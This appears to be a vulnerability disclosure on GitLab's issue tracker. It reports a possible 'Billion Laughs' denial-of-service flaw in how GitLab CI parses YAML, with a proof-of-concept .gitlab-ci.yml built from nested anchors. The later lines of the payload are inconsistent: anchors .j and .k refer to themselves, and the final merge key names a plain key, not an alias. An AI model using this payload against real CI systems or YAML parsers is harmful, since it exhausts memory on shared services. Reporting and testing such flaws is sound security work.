Billion Laughs attack
GitLab CI is (probably) vulnerable to the Billion Laughs attack. It is a Denial Of Service Attack which might affect everything parsing our CI.yml files.
Exploit
Using this file as a .gitlab-ci.yml
.a: &a [echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol"]
.b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
.c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
.d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
.e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
.f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
.g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
.h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
.i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
.j: &j [*j,*j,*j,*j,*j,*j,*j,*j,*j]
.k: &k [*k,*k,*k,*k,*k,*k,*k,*k,*k]
bomb:
<<: .k
'Proof'
I tried it locally and quickly the memory of one of the ruby processes began to increase quite dramatically. I stopped it before machine froze.
Impact
- Everything that parses
.gitlab-ci.yml
on our side, might be affected.
Edited by GitLab SecurityBot